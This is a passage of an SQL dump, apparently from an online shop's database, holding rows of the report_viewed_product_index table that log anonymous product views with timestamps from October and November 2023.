(7031, NULL, NULL, 2059, 1, '2023-10-08 21:40:04'),
(7032, NULL, NULL, 2063, 1, '2023-10-09 08:13:07'),
(7033, NULL, NULL, 2059, 1, '2023-10-09 09:10:00'),
(7034, NULL, NULL, 2061, 1, '2023-10-09 21:11:28'),
(7035, NULL, NULL, 2054, 1, '2023-10-10 00:09:29'),
(7036, NULL, NULL, 2059, 1, '2023-10-10 00:25:08'),
(7037, NULL, NULL, 2054, 1, '2023-10-10 03:40:50'),
(7038, NULL, NULL, 2055, 1, '2023-10-10 03:40:51'),
(7039, NULL, NULL, 2062, 1, '2023-10-10 03:40:51'),
(7040, NULL, NULL, 2063, 1, '2023-10-10 03:40:51'),
(7041, NULL, NULL, 2064, 1, '2023-10-10 03:40:51'),
(7042, NULL, NULL, 2059, 1, '2023-10-10 03:40:51'),
(7043, NULL, NULL, 2060, 1, '2023-10-10 03:40:51'),
(7044, NULL, NULL, 2061, 1, '2023-10-10 03:40:51'),
(7045, NULL, NULL, 2058, 1, '2023-10-10 03:40:51'),
(7046, NULL, NULL, 2060, 1, '2023-10-10 03:40:54'),
(7047, NULL, NULL, 2058, 1, '2023-10-10 03:40:54'),
(7048, NULL, NULL, 2064, 1, '2023-10-10 03:40:54'),
(7049, NULL, NULL, 2063, 1, '2023-10-10 05:49:13'),
(7050, NULL, NULL, 2062, 1, '2023-10-10 06:38:25'),
(7051, NULL, NULL, 2058, 1, '2023-10-10 07:06:34'),
(7052, NULL, NULL, 2062, 1, '2023-10-10 08:18:48'),
(7053, NULL, NULL, 2062, 1, '2023-10-10 12:55:35'),
(7054, NULL, NULL, 2059, 1, '2023-10-10 16:08:17'),
(7055, NULL, NULL, 2059, 1, '2023-10-10 17:56:16'),
(7056, NULL, NULL, 2063, 1, '2023-10-10 18:24:16'),
(7057, NULL, NULL, 2053, 1, '2023-10-11 02:02:44'),
(7058, NULL, NULL, 2064, 1, '2023-10-11 02:02:59'),
(7059, NULL, NULL, 2061, 1, '2023-10-11 03:29:21'),
(7060, 1217, NULL, 2061, 1, '2023-10-11 03:29:56'),
(7062, NULL, NULL, 2059, 1, '2023-10-11 04:53:57'),
(7063, NULL, NULL, 2059, 1, '2023-10-11 07:23:00'),
(7064, NULL, NULL, 2064, 1, '2023-10-11 08:05:34'),
(7065, NULL, NULL, 2064, 1, '2023-10-11 08:05:35'),
(7066, NULL, NULL, 2060, 1, '2023-10-11 10:06:38'),
(7067, NULL, NULL, 2060, 1, '2023-10-11 10:10:30'),
(7068, NULL, NULL, 2060, 1, '2023-10-11 17:19:20'),
(7069, NULL, NULL, 2059, 1, '2023-10-11 18:25:31'),
(7070, NULL, NULL, 2063, 1, '2023-10-11 19:48:40'),
(7071, NULL, NULL, 2054, 1, '2023-10-12 06:39:26'),
(7072, NULL, NULL, 2059, 1, '2023-10-12 08:50:22'),
(7073, NULL, NULL, 2062, 1, '2023-10-12 11:32:36'),
(7074, NULL, NULL, 2053, 1, '2023-10-12 14:07:42'),
(7075, NULL, NULL, 2061, 1, '2023-10-12 16:03:19'),
(7076, NULL, NULL, 2061, 1, '2023-10-12 16:03:36'),
(7077, NULL, NULL, 2059, 1, '2023-10-12 16:15:08'),
(7078, NULL, NULL, 2059, 1, '2023-10-12 18:31:51'),
(7079, NULL, NULL, 2058, 1, '2023-10-12 19:18:55'),
(7080, NULL, NULL, 2061, 1, '2023-10-13 06:02:30'),
(7081, NULL, NULL, 2061, 1, '2023-10-13 06:47:58'),
(7082, NULL, NULL, 2059, 1, '2023-10-13 09:32:58'),
(7083, NULL, NULL, 2060, 1, '2023-10-13 10:25:36'),
(7084, NULL, NULL, 2063, 1, '2023-10-13 10:33:54'),
(7085, NULL, NULL, 2058, 1, '2023-10-13 10:54:55'),
(7086, NULL, NULL, 2059, 1, '2023-10-13 11:02:58'),
(7087, NULL, NULL, 2055, 1, '2023-10-13 11:31:27'),
(7088, NULL, NULL, 2054, 1, '2023-10-13 12:02:57'),
(7089, NULL, NULL, 2061, 1, '2023-10-13 12:42:35'),
(7090, NULL, NULL, 2062, 1, '2023-10-13 13:26:21'),
(7091, NULL, NULL, 2064, 1, '2023-10-13 14:24:42'),
(7092, NULL, NULL, 2054, 1, '2023-10-13 14:55:30'),
(7093, NULL, NULL, 2059, 1, '2023-10-13 15:13:41'),
(7094, NULL, NULL, 2064, 1, '2023-10-13 15:28:47'),
(7095, NULL, NULL, 2054, 1, '2023-10-13 16:34:51'),
(7096, NULL, NULL, 2059, 1, '2023-10-13 17:18:02'),
(7097, NULL, NULL, 2063, 1, '2023-10-13 22:14:29'),
(7098, NULL, NULL, 2063, 1, '2023-10-13 22:14:40'),
(7099, NULL, NULL, 2054, 1, '2023-10-14 05:51:03'),
(7100, NULL, NULL, 2064, 1, '2023-10-14 05:53:07'),
(7101, NULL, NULL, 2054, 1, '2023-10-14 06:21:02'),
(7102, NULL, NULL, 2064, 1, '2023-10-14 06:38:07'),
(7103, NULL, NULL, 2064, 1, '2023-10-14 07:42:51'),
(7104, NULL, NULL, 2059, 1, '2023-10-14 08:20:07'),
(7105, NULL, NULL, 2059, 1, '2023-10-14 11:20:07'),
(7106, NULL, NULL, 2063, 1, '2023-10-15 00:59:37'),
(7107, NULL, NULL, 2055, 1, '2023-10-15 04:53:30'),
(7108, NULL, NULL, 2061, 1, '2023-10-15 13:07:44'),
(7109, NULL, NULL, 2062, 1, '2023-10-15 17:41:22'),
(7110, NULL, NULL, 2064, 1, '2023-10-15 18:37:25'),
(7111, NULL, NULL, 2059, 1, '2023-10-15 19:13:22'),
(7112, NULL, NULL, 2063, 1, '2023-10-15 23:47:37'),
(7113, NULL, NULL, 2055, 1, '2023-10-15 23:47:37'),
(7114, NULL, NULL, 2061, 1, '2023-10-15 23:47:37'),
(7115, NULL, NULL, 2064, 1, '2023-10-15 23:47:37'),
(7116, NULL, NULL, 2060, 1, '2023-10-15 23:47:37'),
(7117, NULL, NULL, 2059, 1, '2023-10-15 23:47:37'),
(7118, NULL, NULL, 2054, 1, '2023-10-15 23:47:37'),
(7119, NULL, NULL, 2062, 1, '2023-10-15 23:47:37'),
(7120, NULL, NULL, 2058, 1, '2023-10-15 23:47:37'),
(7121, NULL, NULL, 2054, 1, '2023-10-15 23:47:45'),
(7122, NULL, NULL, 2064, 1, '2023-10-15 23:47:45'),
(7123, NULL, NULL, 2055, 1, '2023-10-15 23:47:45'),
(7124, NULL, NULL, 2063, 1, '2023-10-15 23:47:45'),
(7125, NULL, NULL, 2062, 1, '2023-10-15 23:47:45'),
(7126, NULL, NULL, 2060, 1, '2023-10-15 23:47:46'),
(7127, NULL, NULL, 2059, 1, '2023-10-15 23:47:46'),
(7128, NULL, NULL, 2061, 1, '2023-10-15 23:47:47'),
(7129, NULL, NULL, 2058, 1, '2023-10-15 23:47:47'),
(7130, NULL, NULL, 2061, 1, '2023-10-16 03:16:28'),
(7131, NULL, NULL, 2055, 1, '2023-10-16 03:16:28'),
(7132, NULL, NULL, 2059, 1, '2023-10-16 03:16:28'),
(7133, NULL, NULL, 2054, 1, '2023-10-16 03:16:28'),
(7134, NULL, NULL, 2064, 1, '2023-10-16 03:16:29'),
(7135, NULL, NULL, 2062, 1, '2023-10-16 03:16:32'),
(7136, NULL, NULL, 2063, 1, '2023-10-16 03:16:33'),
(7137, NULL, NULL, 2060, 1, '2023-10-16 03:16:34'),
(7138, NULL, NULL, 2058, 1, '2023-10-16 03:16:35'),
(7139, NULL, NULL, 2055, 1, '2023-10-16 06:50:29'),
(7140, NULL, NULL, 2059, 1, '2023-10-16 08:48:43'),
(7141, NULL, NULL, 2063, 1, '2023-10-16 09:23:50'),
(7142, NULL, NULL, 2061, 1, '2023-10-16 10:07:44'),
(7143, NULL, NULL, 2061, 1, '2023-10-16 16:28:13'),
(7144, NULL, NULL, 2060, 1, '2023-10-16 16:39:00'),
(7145, NULL, NULL, 2064, 1, '2023-10-16 16:53:34'),
(7146, NULL, NULL, 2064, 1, '2023-10-16 17:38:34'),
(7147, NULL, NULL, 2064, 1, '2023-10-16 17:38:49'),
(7148, NULL, NULL, 2059, 1, '2023-10-16 17:59:37'),
(7149, NULL, NULL, 2063, 1, '2023-10-16 18:48:25'),
(7150, NULL, NULL, 2054, 1, '2023-10-16 19:13:20'),
(7151, NULL, NULL, 2059, 1, '2023-10-17 00:18:31'),
(7152, NULL, NULL, 2062, 1, '2023-10-17 02:47:08'),
(7153, NULL, NULL, 2055, 1, '2023-10-17 02:48:47'),
(7154, NULL, NULL, 2058, 1, '2023-10-17 03:33:43'),
(7155, NULL, NULL, 2064, 1, '2023-10-17 06:18:32'),
(7156, NULL, NULL, 2063, 1, '2023-10-17 16:32:16'),
(7157, NULL, NULL, 2064, 1, '2023-10-17 16:37:49'),
(7158, NULL, NULL, 2064, 1, '2023-10-17 16:48:49'),
(7159, NULL, NULL, 2059, 1, '2023-10-17 19:20:48'),
(7160, NULL, NULL, 2062, 1, '2023-10-18 01:57:15'),
(7161, NULL, NULL, 2064, 1, '2023-10-18 03:31:15'),
(7162, NULL, NULL, 2063, 1, '2023-10-18 03:31:21'),
(7163, NULL, NULL, 2062, 1, '2023-10-18 03:31:25'),
(7164, NULL, NULL, 2061, 1, '2023-10-18 03:31:29'),
(7165, NULL, NULL, 2060, 1, '2023-10-18 03:31:32'),
(7166, NULL, NULL, 2059, 1, '2023-10-18 03:31:37'),
(7167, NULL, NULL, 2058, 1, '2023-10-18 03:31:41'),
(7168, NULL, NULL, 2055, 1, '2023-10-18 03:31:45'),
(7169, NULL, NULL, 2054, 1, '2023-10-18 03:31:49'),
(7170, NULL, NULL, 2053, 1, '2023-10-18 03:36:15'),
(7171, NULL, NULL, 2059, 1, '2023-10-18 07:18:52'),
(7172, NULL, NULL, 2058, 1, '2023-10-18 09:52:04'),
(7173, NULL, NULL, 2064, 1, '2023-10-18 09:57:58'),
(7174, NULL, NULL, 2064, 1, '2023-10-18 09:58:10'),
(7175, NULL, NULL, 2054, 1, '2023-10-18 14:00:24'),
(7176, NULL, NULL, 2059, 1, '2023-10-18 16:59:54'),
(7177, NULL, NULL, 2059, 1, '2023-10-18 16:59:56'),
(7178, NULL, NULL, 2059, 1, '2023-10-18 16:59:58'),
(7179, NULL, NULL, 2059, 1, '2023-10-18 23:23:28'),
(7180, NULL, NULL, 2062, 1, '2023-10-19 02:07:13'),
(7181, NULL, NULL, 2061, 1, '2023-10-19 04:07:27'),
(7182, NULL, NULL, 2061, 1, '2023-10-19 04:07:36'),
(7183, 1245, NULL, 2061, 1, '2023-10-19 04:27:22'),
(7202, 1245, NULL, 2059, 1, '2023-10-19 04:29:00'),
(7211, 1245, NULL, 2064, 1, '2023-10-19 04:29:23'),
(7240, 1245, NULL, 2063, 1, '2023-10-19 04:30:54'),
(7251, 1245, NULL, 2058, 1, '2023-10-19 04:31:11'),
(7275, 1245, NULL, 2062, 1, '2023-10-19 04:31:42'),
(7280, 1245, NULL, 2054, 1, '2023-10-19 04:32:54'),
(7281, 1245, NULL, 2060, 1, '2023-10-19 04:33:13'),
(7320, 1245, NULL, 2055, 1, '2023-10-19 04:36:35'),
(7354, 1245, NULL, 2053, 1, '2023-10-19 04:37:28'),
(7396, NULL, NULL, 2059, 1, '2023-10-19 04:46:17'),
(7397, NULL, NULL, 2064, 1, '2023-10-19 07:11:21'),
(7398, NULL, NULL, 2064, 1, '2023-10-19 07:11:22'),
(7399, NULL, NULL, 2059, 1, '2023-10-19 10:04:40'),
(7400, NULL, NULL, 2053, 1, '2023-10-19 15:49:02'),
(7401, NULL, NULL, 2064, 1, '2023-10-19 16:56:06'),
(7402, NULL, NULL, 2064, 1, '2023-10-19 20:56:11'),
(7403, NULL, NULL, 2064, 1, '2023-10-19 20:56:14'),
(7404, NULL, NULL, 2059, 1, '2023-10-20 07:15:35'),
(7405, NULL, NULL, 2058, 1, '2023-10-20 12:21:14'),
(7406, NULL, NULL, 2053, 1, '2023-10-20 12:46:55'),
(7407, NULL, NULL, 2061, 1, '2023-10-20 15:29:40'),
(7408, NULL, NULL, 2064, 1, '2023-10-20 15:32:34'),
(7409, NULL, NULL, 2063, 1, '2023-10-20 15:37:53'),
(7410, NULL, NULL, 2058, 1, '2023-10-20 15:41:59'),
(7411, NULL, NULL, 2063, 1, '2023-10-20 16:06:37'),
(7412, NULL, NULL, 2061, 1, '2023-10-20 16:31:24'),
(7413, NULL, NULL, 2064, 1, '2023-10-20 17:02:34'),
(7414, NULL, NULL, 2058, 1, '2023-10-20 17:36:58'),
(7415, NULL, NULL, 2063, 1, '2023-10-20 19:23:25'),
(7416, NULL, NULL, 2064, 1, '2023-10-20 19:33:49'),
(7417, NULL, NULL, 2059, 1, '2023-10-20 20:51:20'),
(7418, NULL, NULL, 2064, 1, '2023-10-20 21:12:26'),
(7419, NULL, NULL, 2062, 1, '2023-10-20 21:59:18'),
(7420, NULL, NULL, 2055, 1, '2023-10-20 23:58:44'),
(7421, NULL, NULL, 2062, 1, '2023-10-21 01:15:35'),
(7422, NULL, NULL, 2060, 1, '2023-10-21 02:32:51'),
(7423, NULL, NULL, 2064, 1, '2023-10-21 07:03:22'),
(7424, NULL, NULL, 2061, 1, '2023-10-21 07:05:34'),
(7425, NULL, NULL, 2054, 1, '2023-10-21 07:16:50'),
(7426, NULL, NULL, 2064, 1, '2023-10-21 09:43:42'),
(7427, NULL, NULL, 2064, 1, '2023-10-21 10:22:05'),
(7428, NULL, NULL, 2061, 1, '2023-10-21 22:20:05'),
(7429, NULL, NULL, 2063, 1, '2023-10-22 00:02:48'),
(7430, NULL, NULL, 2061, 1, '2023-10-22 03:02:51'),
(7431, NULL, NULL, 2059, 1, '2023-10-22 03:36:49'),
(7432, NULL, NULL, 2064, 1, '2023-10-22 06:40:52'),
(7433, NULL, NULL, 2059, 1, '2023-10-22 06:47:48'),
(7434, NULL, NULL, 2061, 1, '2023-10-22 07:18:08'),
(7435, NULL, NULL, 2059, 1, '2023-10-22 07:18:37'),
(7436, NULL, NULL, 2059, 1, '2023-10-22 13:35:13'),
(7437, NULL, NULL, 2063, 1, '2023-10-22 14:52:37'),
(7438, NULL, NULL, 2060, 1, '2023-10-22 19:14:19'),
(7439, NULL, NULL, 2063, 1, '2023-10-22 19:24:32'),
(7440, NULL, NULL, 2058, 1, '2023-10-22 19:48:48'),
(7441, NULL, NULL, 2055, 1, '2023-10-22 20:32:01'),
(7442, NULL, NULL, 2060, 1, '2023-10-22 21:34:30'),
(7443, NULL, NULL, 2063, 1, '2023-10-22 21:48:45'),
(7444, NULL, NULL, 2062, 1, '2023-10-22 21:51:08'),
(7445, NULL, NULL, 2058, 1, '2023-10-22 22:06:49'),
(7446, NULL, NULL, 2055, 1, '2023-10-22 22:47:37'),
(7447, NULL, NULL, 2061, 1, '2023-10-22 23:52:34'),
(7448, NULL, NULL, 2060, 1, '2023-10-23 00:35:13'),
(7449, NULL, NULL, 2063, 1, '2023-10-23 00:45:15'),
(7450, NULL, NULL, 2058, 1, '2023-10-23 01:09:49'),
(7451, NULL, NULL, 2060, 1, '2023-10-23 02:07:05'),
(7452, NULL, NULL, 2063, 1, '2023-10-23 02:16:40'),
(7453, NULL, NULL, 2058, 1, '2023-10-23 02:39:49'),
(7454, NULL, NULL, 2055, 1, '2023-10-23 03:26:33'),
(7455, NULL, NULL, 2061, 1, '2023-10-23 04:42:40'),
(7456, NULL, NULL, 2062, 1, '2023-10-23 05:28:10'),
(7457, NULL, NULL, 2060, 1, '2023-10-23 05:30:24'),
(7458, NULL, NULL, 2063, 1, '2023-10-23 05:30:32'),
(7459, NULL, NULL, 2058, 1, '2023-10-23 05:30:46'),
(7460, NULL, NULL, 2055, 1, '2023-10-23 05:30:58'),
(7461, NULL, NULL, 2061, 1, '2023-10-23 05:31:30'),
(7462, NULL, NULL, 2062, 1, '2023-10-23 05:31:38'),
(7463, NULL, NULL, 2054, 1, '2023-10-23 05:31:56'),
(7464, NULL, NULL, 2059, 1, '2023-10-23 05:32:03'),
(7465, NULL, NULL, 2064, 1, '2023-10-23 05:32:07'),
(7466, NULL, NULL, 2060, 1, '2023-10-23 06:38:11'),
(7467, NULL, NULL, 2054, 1, '2023-10-23 06:40:41'),
(7468, NULL, NULL, 2054, 1, '2023-10-23 06:40:41'),
(7469, NULL, NULL, 2054, 1, '2023-10-23 06:40:43'),
(7470, NULL, NULL, 2063, 1, '2023-10-23 06:48:18'),
(7471, NULL, NULL, 2061, 1, '2023-10-23 07:07:42'),
(7472, NULL, NULL, 2058, 1, '2023-10-23 07:11:59'),
(7473, NULL, NULL, 2055, 1, '2023-10-23 07:53:38'),
(7474, NULL, NULL, 2061, 1, '2023-10-23 09:01:25'),
(7475, NULL, NULL, 2062, 1, '2023-10-23 09:46:40'),
(7476, NULL, NULL, 2054, 1, '2023-10-23 11:19:18'),
(7477, NULL, NULL, 2059, 1, '2023-10-23 11:20:00'),
(7478, NULL, NULL, 2059, 1, '2023-10-23 11:38:25'),
(7479, NULL, NULL, 2064, 1, '2023-10-23 11:54:30'),
(7480, NULL, NULL, 2063, 1, '2023-10-23 20:13:48'),
(7481, NULL, NULL, 2060, 1, '2023-10-23 21:33:05'),
(7482, NULL, NULL, 2063, 1, '2023-10-23 21:42:53'),
(7483, NULL, NULL, 2060, 1, '2023-10-23 22:18:00'),
(7484, NULL, NULL, 2063, 1, '2023-10-23 22:27:17'),
(7485, NULL, NULL, 2063, 1, '2023-10-23 22:31:18'),
(7486, NULL, NULL, 2058, 1, '2023-10-23 22:50:37'),
(7487, NULL, NULL, 2063, 1, '2023-10-23 22:53:48'),
(7488, NULL, NULL, 2055, 1, '2023-10-23 23:33:18'),
(7489, NULL, NULL, 2060, 1, '2023-10-24 00:42:38'),
(7490, NULL, NULL, 2063, 1, '2023-10-24 00:54:46'),
(7491, NULL, NULL, 2058, 1, '2023-10-24 01:23:45'),
(7492, NULL, NULL, 2055, 1, '2023-10-24 02:17:56'),
(7493, NULL, NULL, 2061, 1, '2023-10-24 03:41:59'),
(7494, NULL, NULL, 2062, 1, '2023-10-24 04:34:00'),
(7495, NULL, NULL, 2054, 1, '2023-10-24 06:21:47'),
(7496, NULL, NULL, 2059, 1, '2023-10-24 06:32:44'),
(7497, NULL, NULL, 2059, 1, '2023-10-24 06:45:31'),
(7498, NULL, NULL, 2064, 1, '2023-10-24 07:05:28'),
(7499, NULL, NULL, 2063, 1, '2023-10-24 07:58:43'),
(7500, NULL, NULL, 2063, 1, '2023-10-24 07:58:49'),
(7501, NULL, NULL, 2063, 1, '2023-10-24 07:58:53'),
(7502, NULL, NULL, 2054, 1, '2023-10-24 11:00:35'),
(7503, NULL, NULL, 2054, 1, '2023-10-24 11:47:36'),
(7504, NULL, NULL, 2064, 1, '2023-10-24 16:36:39'),
(7505, NULL, NULL, 2063, 1, '2023-10-24 18:06:39'),
(7506, NULL, NULL, 2059, 1, '2023-10-24 18:18:39'),
(7507, NULL, NULL, 2055, 1, '2023-10-24 19:08:47'),
(7508, NULL, NULL, 2058, 1, '2023-10-24 19:08:48'),
(7509, NULL, NULL, 2058, 1, '2023-10-24 20:28:52'),
(7510, NULL, NULL, 2063, 1, '2023-10-25 00:38:17'),
(7511, NULL, NULL, 2063, 1, '2023-10-25 01:20:20'),
(7512, NULL, NULL, 2059, 1, '2023-10-25 03:44:10'),
(7513, NULL, NULL, 2053, 1, '2023-10-25 10:47:43'),
(7514, NULL, NULL, 2063, 1, '2023-10-26 09:15:49'),
(7515, NULL, NULL, 2059, 1, '2023-10-26 17:47:15'),
(7516, NULL, NULL, 2063, 1, '2023-10-26 22:50:47'),
(7517, NULL, NULL, 2063, 1, '2023-10-26 23:05:27'),
(7518, NULL, NULL, 2062, 1, '2023-10-27 02:07:34'),
(7519, NULL, NULL, 2064, 1, '2023-10-27 04:17:25'),
(7520, NULL, NULL, 2061, 1, '2023-10-27 14:19:18'),
(7521, NULL, NULL, 2061, 1, '2023-10-27 14:22:00'),
(7522, NULL, NULL, 2059, 1, '2023-10-27 14:51:00'),
(7523, NULL, NULL, 2061, 1, '2023-10-28 01:13:17'),
(7524, NULL, NULL, 2054, 1, '2023-10-28 03:21:21'),
(7525, NULL, NULL, 2059, 1, '2023-10-28 04:52:23'),
(7526, NULL, NULL, 2054, 1, '2023-10-28 17:04:06'),
(7527, NULL, NULL, 2059, 1, '2023-10-28 21:17:10'),
(7528, NULL, NULL, 2061, 1, '2023-10-29 03:03:14'),
(7529, NULL, NULL, 2055, 1, '2023-10-29 03:13:22'),
(7530, NULL, NULL, 2053, 1, '2023-10-29 04:22:10'),
(7531, NULL, NULL, 2063, 1, '2023-10-29 04:22:28'),
(7532, NULL, NULL, 2062, 1, '2023-10-29 04:22:31'),
(7533, NULL, NULL, 2060, 1, '2023-10-29 04:22:37'),
(7534, NULL, NULL, 2059, 1, '2023-10-29 04:22:40'),
(7535, NULL, NULL, 2059, 1, '2023-10-29 08:05:51'),
(7536, NULL, NULL, 2064, 1, '2023-10-29 09:26:21'),
(7537, NULL, NULL, 2061, 1, '2023-10-29 11:17:36'),
(7538, NULL, NULL, 2061, 1, '2023-10-29 12:53:54'),
(7539, NULL, NULL, 2061, 1, '2023-10-29 12:55:05'),
(7540, NULL, NULL, 2061, 1, '2023-10-29 13:51:43'),
(7541, NULL, NULL, 2060, 1, '2023-10-29 17:22:11'),
(7542, NULL, NULL, 2054, 1, '2023-10-29 17:39:55'),
(7543, NULL, NULL, 2064, 1, '2023-10-29 18:33:35'),
(7544, NULL, NULL, 2063, 1, '2023-10-29 18:38:57'),
(7545, NULL, NULL, 2054, 1, '2023-10-29 20:58:29'),
(7546, NULL, NULL, 2063, 1, '2023-10-29 23:53:15'),
(7547, NULL, NULL, 2064, 1, '2023-10-30 02:26:47'),
(7548, NULL, NULL, 2061, 1, '2023-10-30 02:40:36'),
(7549, NULL, NULL, 2059, 1, '2023-10-30 02:45:53'),
(7550, NULL, NULL, 2062, 1, '2023-10-30 03:12:17'),
(7551, NULL, NULL, 2055, 1, '2023-10-30 03:50:07'),
(7552, NULL, NULL, 2062, 1, '2023-10-30 03:51:38'),
(7553, NULL, NULL, 2058, 1, '2023-10-30 04:34:53'),
(7554, NULL, NULL, 2064, 1, '2023-10-30 12:13:54'),
(7555, NULL, NULL, 2055, 1, '2023-10-31 00:16:18'),
(7556, NULL, NULL, 2060, 1, '2023-10-31 02:52:31'),
(7557, NULL, NULL, 2061, 1, '2023-10-31 07:23:23'),
(7558, NULL, NULL, 2063, 1, '2023-10-31 08:08:22'),
(7559, NULL, NULL, 2061, 1, '2023-10-31 08:26:07'),
(7560, NULL, NULL, 2055, 1, '2023-10-31 08:44:22'),
(7561, NULL, NULL, 2063, 1, '2023-10-31 11:14:24'),
(7562, NULL, NULL, 2063, 1, '2023-10-31 11:14:59'),
(7563, NULL, NULL, 2061, 1, '2023-10-31 11:38:51'),
(7564, NULL, NULL, 2058, 1, '2023-10-31 12:56:23'),
(7565, NULL, NULL, 2062, 1, '2023-10-31 16:51:48'),
(7566, NULL, NULL, 2063, 1, '2023-10-31 16:51:49'),
(7567, NULL, NULL, 2063, 1, '2023-10-31 16:51:50'),
(7568, NULL, NULL, 2063, 1, '2023-10-31 22:26:22'),
(7569, NULL, NULL, 2061, 1, '2023-10-31 22:35:54'),
(7570, NULL, NULL, 2059, 1, '2023-11-01 03:39:48'),
(7571, NULL, NULL, 2061, 1, '2023-11-01 04:23:11'),
(7572, NULL, NULL, 2060, 1, '2023-11-01 04:31:29'),
(7573, NULL, NULL, 2060, 1, '2023-11-01 04:31:34'),
(7574, NULL, NULL, 2059, 1, '2023-11-01 09:10:44'),
(7575, NULL, NULL, 2060, 1, '2023-11-01 10:21:48'),
(7576, NULL, NULL, 2059, 1, '2023-11-01 11:52:31'),
(7577, NULL, NULL, 2061, 1, '2023-11-01 12:01:00'),
(7578, NULL, NULL, 2061, 1, '2023-11-01 12:03:27'),
(7579, NULL, NULL, 2054, 1, '2023-11-01 14:25:44'),
(7580, NULL, NULL, 2060, 1, '2023-11-01 21:06:47'),
(7581, NULL, NULL, 2061, 1, '2023-11-01 21:30:10'),
(7582, NULL, NULL, 2060, 1, '2023-11-01 21:44:15'),
(7583, NULL, NULL, 2063, 1, '2023-11-01 21:49:08'),
(7584, NULL, NULL, 2058, 1, '2023-11-01 22:12:30'),
(7585, NULL, NULL, 2055, 1, '2023-11-01 22:22:32'),
(7586, NULL, NULL, 2063, 1, '2023-11-01 22:23:25'),
(7587, NULL, NULL, 2055, 1, '2023-11-01 22:53:49'),
(7588, NULL, NULL, 2061, 1, '2023-11-01 23:30:10'),
(7589, NULL, NULL, 2061, 1, '2023-11-02 00:01:25'),
(7590, NULL, NULL, 2060, 1, '2023-11-02 00:58:04'),
(7591, NULL, NULL, 2063, 1, '2023-11-02 01:09:33'),
(7592, NULL, NULL, 2058, 1, '2023-11-02 01:36:32'),
(7593, NULL, NULL, 2055, 1, '2023-11-02 01:46:58'),
(7594, NULL, NULL, 2055, 1, '2023-11-02 02:24:59'),
(7595, NULL, NULL, 2061, 1, '2023-11-02 03:48:22'),
(7596, NULL, NULL, 2062, 1, '2023-11-02 04:30:48'),
(7597, NULL, NULL, 2060, 1, '2023-11-02 05:44:01'),
(7598, NULL, NULL, 2063, 1, '2023-11-02 05:53:46'),
(7599, NULL, NULL, 2058, 1, '2023-11-02 06:16:19'),
(7600, NULL, NULL, 2061, 1, '2023-11-02 06:52:33'),
(7601, NULL, NULL, 2055, 1, '2023-11-02 06:56:48'),
(7602, NULL, NULL, 2054, 1, '2023-11-02 07:26:59'),
(7603, NULL, NULL, 2061, 1, '2023-11-02 07:52:32'),
(7604, NULL, NULL, 2061, 1, '2023-11-02 08:08:43'),
(7605, NULL, NULL, 2062, 1, '2023-11-02 08:48:18'),
(7606, NULL, NULL, 2064, 1, '2023-11-02 08:52:02'),
(7607, NULL, NULL, 2054, 1, '2023-11-02 10:04:13'),
(7608, NULL, NULL, 2059, 1, '2023-11-02 10:21:58'),
(7609, NULL, NULL, 2064, 1, '2023-11-02 10:36:06'),
(7610, NULL, NULL, 2054, 1, '2023-11-02 16:22:38'),
(7611, NULL, NULL, 2059, 1, '2023-11-02 17:07:37'),
(7612, NULL, NULL, 2060, 1, '2023-11-02 20:56:12'),
(7613, NULL, NULL, 2063, 1, '2023-11-02 21:06:04'),
(7614, NULL, NULL, 2060, 1, '2023-11-02 21:47:29'),
(7615, NULL, NULL, 2063, 1, '2023-11-02 21:59:02'),
(7616, NULL, NULL, 2058, 1, '2023-11-02 22:27:11'),
(7617, NULL, NULL, 2055, 1, '2023-11-02 23:13:50'),
(7618, NULL, NULL, 2061, 1, '2023-11-03 00:19:08'),
(7619, NULL, NULL, 2062, 1, '2023-11-03 00:57:35'),
(7620, NULL, NULL, 2054, 1, '2023-11-03 02:12:07'),
(7621, NULL, NULL, 2059, 1, '2023-11-03 02:28:43'),
(7622, NULL, NULL, 2064, 1, '2023-11-03 02:42:57'),
(7623, NULL, NULL, 2062, 1, '2023-11-03 03:16:59'),
(7624, NULL, NULL, 2054, 1, '2023-11-03 04:12:05'),
(7625, NULL, NULL, 2062, 1, '2023-11-03 04:53:03'),
(7626, NULL, NULL, 2060, 1, '2023-11-03 05:09:01'),
(7627, NULL, NULL, 2054, 1, '2023-11-03 07:52:19'),
(7628, NULL, NULL, 2053, 1, '2023-11-03 08:30:35'),
(7629, NULL, NULL, 2064, 1, '2023-11-03 09:45:44'),
(7630, NULL, NULL, 2064, 1, '2023-11-03 13:21:05'),
(7631, NULL, NULL, 2063, 1, '2023-11-03 13:33:52'),
(7632, NULL, NULL, 2059, 1, '2023-11-03 15:21:34'),
(7633, NULL, NULL, 2062, 1, '2023-11-03 16:36:15'),
(7634, NULL, NULL, 2060, 1, '2023-11-03 18:24:47'),
(7635, NULL, NULL, 2058, 1, '2023-11-03 18:38:40'),
(7636, NULL, NULL, 2058, 1, '2023-11-03 19:01:09'),
(7637, NULL, NULL, 2064, 1, '2023-11-03 19:14:21'),
(7638, NULL, NULL, 2055, 1, '2023-11-03 19:54:23'),
(7639, NULL, NULL, 2054, 1, '2023-11-03 20:29:44'),
(7640, NULL, NULL, 2061, 1, '2023-11-03 22:43:53'),
(7641, NULL, NULL, 2055, 1, '2023-11-04 03:24:18'),
(7642, NULL, NULL, 2063, 1, '2023-11-04 05:18:08'),
(7643, NULL, NULL, 2062, 1, '2023-11-04 06:07:11'),
(7644, NULL, NULL, 2062, 1, '2023-11-04 07:10:29'),
(7645, NULL, NULL, 2064, 1, '2023-11-04 14:53:53'),
(7646, NULL, NULL, 2061, 1, '2023-11-04 18:07:02');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(7647, NULL, NULL, 2059, 1, '2023-11-04 18:33:48'),
(7648, NULL, NULL, 2061, 1, '2023-11-04 18:53:37'),
(7649, NULL, NULL, 2061, 1, '2023-11-04 19:46:38'),
(7650, NULL, NULL, 2061, 1, '2023-11-04 20:09:17'),
(7651, NULL, NULL, 2061, 1, '2023-11-04 23:04:50'),
(7652, NULL, NULL, 2061, 1, '2023-11-04 23:32:47'),
(7653, NULL, NULL, 2061, 1, '2023-11-05 01:00:19'),
(7654, NULL, NULL, 2061, 1, '2023-11-05 02:22:07'),
(7655, NULL, NULL, 2061, 1, '2023-11-05 02:45:26'),
(7656, NULL, NULL, 2061, 1, '2023-11-05 02:45:49'),
(7657, NULL, NULL, 2059, 1, '2023-11-05 03:10:50'),
(7658, NULL, NULL, 2060, 1, '2023-11-05 03:36:38'),
(7659, NULL, NULL, 2058, 1, '2023-11-05 03:36:39'),
(7660, NULL, NULL, 2054, 1, '2023-11-05 03:36:48'),
